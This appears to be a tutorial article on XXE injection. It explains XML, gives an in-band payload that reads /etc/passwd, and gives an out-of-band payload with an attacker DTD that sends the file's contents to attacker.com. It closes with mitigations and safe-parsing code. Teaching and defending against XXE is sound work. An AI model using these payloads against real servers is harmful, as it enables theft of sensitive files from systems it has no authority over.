XML External Entity (XXE) injection is a security vulnerability that lets an attacker interfere with the way a web application processes XML data. The attack occurs when a misconfigured XML parser processes XML input that contains a reference to an external resource. It differs from SQL injection, but the two share a common theme: attacker-controlled input is interpreted as instructions rather than as plain data. The attacker exploits the vulnerability by embedding a malicious inline DOCTYPE definition in the XML data.
In this article, we will take a thorough look at XML and at two types of XXE attack, namely normal (in-band) and out-of-band XXE. We will also cover the signs that suggest an application may be vulnerable to XXE, and walk through a practical example of using external entities to retrieve sensitive files from a vulnerable server.
What is XML?
XML is designed to transport and store data, and it separates the information from its presentation. Using XML, we can organize our information and describe exactly what each piece of it means. A sample XML document is as follows:

XML doesn’t have predefined tags like HTML does, so we define our own tags to describe whatever data we have. In the above document, we have different tags for the book id, the author, the title, the price, the publishing date, and the description of the book. All of this information is human-readable, and anyone reading it can easily tell what it is about. That is what XML is designed to do: store and transport information in a meaningful way. XML stands for Extensible Markup Language, which means that we can create tags with whatever names we want so that they present the data as meaningfully as possible. Unlike HTML, XML is not used to display the information it stores; HTML, CSS, and JavaScript provide that functionality.
Nodes that are at the same level of the tree are called siblings. For example, in the above case the author, title, genre, description, and publish_date tags are at the same level and share the same indentation. They are all children of the same parent element, the book element identified by its id. This is called the XML logical structure, which further organizes our data.
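The parent and sibling relationship described above can be checked with a short Python sketch. The document below is a hypothetical stand-in, not the article's original sample: the tag names follow the ones mentioned in the text, while the values and the id "bk101" are made up for illustration.

```python
import xml.etree.ElementTree as ET

# Hypothetical sample: tag names follow the article, values are invented.
SAMPLE = """<?xml version="1.0"?>
<book id="bk101">
  <author>Example Author</author>
  <title>Example Title</title>
  <genre>Computer</genre>
  <price>44.95</price>
  <publish_date>2000-10-01</publish_date>
  <description>A short description of the book.</description>
</book>"""

# Parse the document; the returned element is the root (<book>).
book = ET.fromstring(SAMPLE)

# Iterating over an element yields its direct children, i.e. the siblings.
sibling_tags = [child.tag for child in book]

print("parent:", book.tag, "id =", book.get("id"))
for child in book:
    print(f"  {child.tag}: {child.text}")
```

Every element printed in the loop shares the same parent, which is what makes them siblings in the XML tree.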


The opening and closing tags of each node make it easy to navigate the displayed information. The information stored in an XML document can also be transported between web services.
XXE
XXE is a vulnerability that attackers exploit because of a misconfiguration in the XML parser. The normal (in-band) variant described in this section is the most common type of XXE attack, and it is generally used to retrieve sensitive files or, in some cases, even to get a reverse shell on the system. There are three major steps in an XXE attack:
- If XML is in the request, declare a local entity
- Reference the entity in an existing XML element
- If both of these steps worked fine, start the exploitation process by retrieving the sensitive files
XML allows the declaration of entities, which are named references to content defined elsewhere. External entities are similar to local (internal) entities; the difference is that instead of referencing something defined inside the XML document, an external entity references something outside it. For example, a URI scheme such as file:// can point at a sensitive file, so we can leverage the XML parser misconfiguration to force the application to fetch the file’s contents.
Now we will perform the above steps, in the same order, on a vulnerable application to retrieve the “/etc/passwd” file from a server. First of all, we find that an XML payload is being sent by the stock check function of a shopping website.

Now we try to declare a DOCTYPE, and within that DOCTYPE we declare an entity, i.e., <!DOCTYPE test [ <!ENTITY xxe "test"> ]>. Let’s see what happens after we declare the entity xxe.
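To see what a parser does with such a local entity, the probe can be tried offline. The sketch below is only a local experiment with Python's standard xml.etree.ElementTree, not the target application; the stockCheck, productId, and storeId element names are borrowed from the article's payload, and the PROBE constant is a name introduced here for illustration.

```python
import xml.etree.ElementTree as ET

# Local probe: declare an internal entity and reference it in an element.
PROBE = """<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [ <!ENTITY xxe "test"> ]>
<stockCheck><productId>&xxe;</productId><storeId>1</storeId></stockCheck>"""

root = ET.fromstring(PROBE)

# The parser substitutes the entity's replacement text for the reference.
product_id = root.findtext("productId")
print("productId =", product_id)
```

If a remote application echoes the replacement text back in the same way, that suggests its parser accepts DOCTYPE declarations and expands entities, which is the precondition for the next step.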

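The application does not throw an error, so the parser accepts DOCTYPE declarations. Now we reference our entity “xxe” in an existing XML element, this time declaring it as an external entity that points to “file:///etc/passwd”: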
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<stockCheck>
<productId>
&xxe;
</productId>
<storeId>
1
</storeId>
</stockCheck>

We can see that the XML parser processed our XML and, wherever we referenced our malicious “xxe” entity, replaced the reference with the contents of “/etc/passwd”. Our attack has been successful, and we have retrieved the contents of “/etc/passwd”.
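For contrast, a parser that does not resolve external entities handles the same payload very differently. The sketch below feeds the payload to Python's standard xml.etree.ElementTree, which, according to the Python documentation's notes on XML vulnerabilities, does not expand external entities and raises a ParseError when one occurs. The try_parse helper is a name introduced here for illustration.

```python
import xml.etree.ElementTree as ET

# The same external-entity payload as above, in compact form.
PAYLOAD = """<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<stockCheck><productId>&xxe;</productId><storeId>1</storeId></stockCheck>"""


def try_parse(xml_text):
    """Report whether the parser accepted or rejected the document."""
    try:
        root = ET.fromstring(xml_text)
    except ET.ParseError as exc:
        # The external entity is never fetched; parsing stops with an error.
        return f"rejected: {exc}"
    return f"parsed: productId={root.findtext('productId')!r}"


result = try_parse(PAYLOAD)
print(result)
```

The file is never read in this case, which illustrates that the attack depends on how the parser is configured rather than on XML itself.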
Out-of-Band XXE
Out-of-band XXE attacks are similar to normal XXE attacks. The only difference is that the attacker makes the parser send an additional request to a server under the attacker’s control, unlike normal XXE attacks where the result comes back immediately in the same band, that is, in the application’s response. An application may be vulnerable to this type of attack when the following conditions are suspected:
- Tainted data within the Document Type Declaration (DTD) identifier
- The web application parses XML documents
- The XML processor validates and processes the DTD
Out-of-Band XXE attacks can have the same amount of impact as normal XXE attacks.
Request:
POST http://targeturl.com/vulnerable
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE xxe[
<!ENTITY % file SYSTEM
"file:///etc/passwd">
<!ENTITY % dtd SYSTEM
"http://attacker.com/malicious.dtd">
%dtd;
]>
<xxe>&send;</xxe>
Attacker DTD (attacker.com/malicious.dtd)
<!ENTITY % all "<!ENTITY send SYSTEM 'http://attacker.com/?store=%file;'>">
%all;
The attack will take place in the following steps.
First, the parser processes the “%file” parameter entity, which loads the “/etc/passwd” file. Next, it makes a request to “http://attacker.com/malicious.dtd” and processes the attacker’s DTD file. There, the “%all” parameter entity creates a general entity called “&send”, whose system identifier is a URL that contains the contents of the “/etc/passwd” file. Finally, once that URL has been constructed, the “&send” entity referenced in the document body is processed, which makes a request to the attacker’s server. On that server, the attacker can reconstruct the “/etc/passwd” file from the log entry.
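The order of these expansions can be traced with a toy model. The sketch below is plain string substitution, not a real XML parser, and it performs no file or network access: the file contents are a made-up single line, and the expand helper and PARAM_REF pattern are names introduced here. It assumes the parameter entity holding the file contents is the one declared as "file" in the request.

```python
import re

# Matches a parameter entity reference such as %file; or %all;
PARAM_REF = re.compile(r"%([A-Za-z_][\w.-]*);")


def expand(text, params):
    """Replace each %name; with its value, leaving unknown names untouched."""
    return PARAM_REF.sub(lambda m: params.get(m.group(1), m.group(0)), text)


# Step 1: %file is bound to the file contents (a stand-in line here).
params = {"file": "root:x:0:0:root:/root:/bin/bash"}

# Step 2: the attacker's DTD declares %all; its value mentions %file;,
# which is substituted when the declaration is processed.
all_literal = "<!ENTITY send SYSTEM 'http://attacker.com/?store=%file;'>"
params["all"] = expand(all_literal, params)

# Step 3: expanding %all; yields a declaration of the general entity "send".
send_url = re.search(r"SYSTEM '([^']*)'", params["all"]).group(1)

# Step 4: resolving &send; would make the parser request this URL.
print(send_url)
```

In a real attack the parser does this work itself, and content containing newlines or special characters may not survive being placed in a URL, so the model only shows the sequence of substitutions.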
Conclusion
XXE attacks are among the most common attacks against web applications that use XML parsers. XXE vulnerabilities can have severe impacts: both in-band and out-of-band XXE attacks can lead to Server-Side Request Forgery (SSRF), Denial of Service (DoS), retrieval of sensitive files, and more.
XXE attacks can be mitigated to a great extent by taking some protective measures: reviewing the XML parsing library that the web application uses, disabling the parser features that weaken it, and in particular disabling DTD processing and external entity resolution, which are what make the application vulnerable.
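One way to disable DTD processing is to reject any document that carries a DOCTYPE declaration before it reaches the application. The following is a minimal sketch of that idea using only Python's standard library, under the assumption that the application never needs DTDs; the DTDForbidden exception and the parse_untrusted function are names introduced here, not part of any library.

```python
import xml.etree.ElementTree as ET
from xml.parsers import expat


class DTDForbidden(ValueError):
    """Raised when a document contains a DOCTYPE declaration."""


def _reject_doctype(name, system_id, public_id, has_internal_subset):
    # Called by expat as soon as a DOCTYPE declaration starts.
    raise DTDForbidden(f"DOCTYPE declaration {name!r} is not allowed")


def parse_untrusted(xml_bytes):
    """Parse XML only if it contains no DOCTYPE declaration."""
    checker = expat.ParserCreate()
    checker.StartDoctypeDeclHandler = _reject_doctype
    # Raises DTDForbidden for any DOCTYPE, or expat.ExpatError if malformed.
    checker.Parse(xml_bytes, True)
    # Only documents without a DTD reach the regular parser.
    return ET.fromstring(xml_bytes)


doc = parse_untrusted(b"<stockCheck><productId>1</productId></stockCheck>")
print(doc.findtext("productId"))
```

Because entities can only be declared inside a DOCTYPE, refusing the declaration outright blocks both the in-band and the out-of-band payloads shown earlier. The document is parsed twice here for simplicity, which a production implementation would likely avoid.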